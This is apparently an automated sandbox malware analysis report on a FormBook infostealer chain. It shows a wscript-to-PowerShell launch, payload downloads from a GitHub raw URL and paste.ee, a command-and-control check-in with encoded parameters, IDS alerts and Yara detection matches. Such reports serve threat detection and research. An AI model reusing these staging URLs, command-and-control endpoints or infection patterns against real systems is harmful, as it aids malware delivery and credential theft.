Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2502842295.00007FFD34860000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\convert.exe	Code function: 4x nop then mov ebx, 00000004h	19_2_035604DE
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 4x nop then pop edi	24_2_04A194DF
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 4x nop then xor eax, eax	24_2_04A1D075
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 4x nop then pop edi	24_2_04A17BCC

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50000 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49842 -> 188.114.96.3:443

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: paste.ee

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /d/SKF1O/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 199.59.243.227 199.59.243.227

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: BODIS-NJUS BODIS-NJUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /d/SKF1O/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /6450/?EzrD=UbYh&mzEt0=52WN8KqJ7jnOEIaeyCxqWgP+KtwCoaIDn8AokGilDz2wl3Qo7VTMWMYazPgXvK5QOqLqt5Ti3xVPGgdXo5E4TqsbUcYSzSRqT9OtwmziQ+LYHZobMnJC5bEpbrqa7K8o2xX/TOE= HTTP/1.1Host: www.donante-de-ovulos.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-si; HTC_Desire_601 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: paste.ee
Source: global traffic	DNS traffic detected: DNS query: www.donante-de-ovulos.biz

Source: powershell.exe, 00000008.00000002.2479829877.000001B5FF4CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: svchost.exe, 0000001B.00000002.3540546756.0000021B42E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.27.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.27.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.27.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.27.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.27.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.27.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.27.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.27.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000008.00000002.2445760088.000001B5F72E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2410867830.000001B5E8BBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://paste.ee
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8B37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8906000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000005.00000002.2347449551.000001F606841000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2508706310.000001875DE91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2410867830.000001B5E7271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E894F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8B37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000005.00000002.2347449551.000001F60688E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000005.00000002.2347449551.000001F6068A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2508706310.000001875DEBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2508706310.000001875DECE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2410867830.000001B5E7271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee;
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com;
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8BBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8BBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8BBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: edb.log.27.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000001B.00000003.2994764845.0000021B43050000.00000004.00000800.00020000.00000000.sdmp, edb.log.27.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8B37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8428000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000005.00000002.2350094223.000001F61E99F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.microsoft.co
Source: convert.exe, 00000013.00000002.2974673632.0000000002F5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: convert.exe, 00000013.00000003.2911076657.0000000007EB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: convert.exe, 00000013.00000002.2974673632.0000000002F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_d
Source: convert.exe, 00000013.00000002.2974673632.0000000002F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: convert.exe, 00000013.00000002.2974673632.0000000002F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: convert.exe, 00000013.00000002.2974673632.0000000002F5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: convert.exe, 00000013.00000002.2974673632.0000000002F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: convert.exe, 00000013.00000002.2974673632.0000000002F5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: powershell.exe, 00000008.00000002.2445760088.000001B5F72E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2410867830.000001B5E8BBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E894F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E894F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E7681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E7681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/SKF1O/0
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8901000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E7492000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2410867830.000001B5E8611000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E7492000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2410867830.000001B5E8611000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E7492000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txth3k;
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.gravatar.com
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://themes.googleusercontent.com
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977602776.0000000004074000.00000004.10000000.00040000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3537079576.0000000002984000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3534781987.000000002F5F4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com;
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823

Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.6:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49842 version: TLS 1.2

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 10.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3538540839.00000000049D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2728680734.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2728578874.0000000003C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2976888806.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2727369839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3536826392.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2976926414.0000000003440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 10.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000018.00000002.3538540839.00000000049D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2728680734.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2728578874.0000000003C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.2976888806.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
